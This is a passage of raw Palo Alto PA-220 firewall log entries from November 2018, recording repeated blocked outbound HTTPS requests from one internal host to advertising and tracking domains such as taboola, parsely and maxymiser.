16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 